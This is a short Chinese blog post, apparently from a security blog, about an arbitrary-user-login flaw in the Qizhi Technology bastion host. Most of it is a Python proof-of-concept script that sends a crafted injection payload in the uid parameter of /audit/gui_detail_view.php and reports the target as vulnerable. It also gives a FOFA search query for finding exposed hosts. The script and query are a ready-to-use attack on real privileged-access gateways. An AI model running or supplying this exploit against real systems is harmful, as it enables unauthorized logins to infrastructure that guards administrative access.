描述
齐治堡垒机某版本任意用户登录.md fofa app=”齐治科技-堡垒机”
POC & EXP
import requests,sys,re,urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# for url in open("C:/1.txt","r"):
if len(sys.argv)<2:
print("[+]Use: pyhton3 齐治科技-堡垒机.py http://ip:port")
print("[+]Explain: HADESI")
print("[+]============================")
sys.exit()
url=sys.argv[1]
url1=url+"/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm"
res = requests.get(url=url1,verify=False)
# print (res.status_code)
if res.status_code == 200 :
print(url1+">>>>>漏洞存在")
转载请注明:Adminxe's Blog » 齐治堡垒机任意用户登录漏洞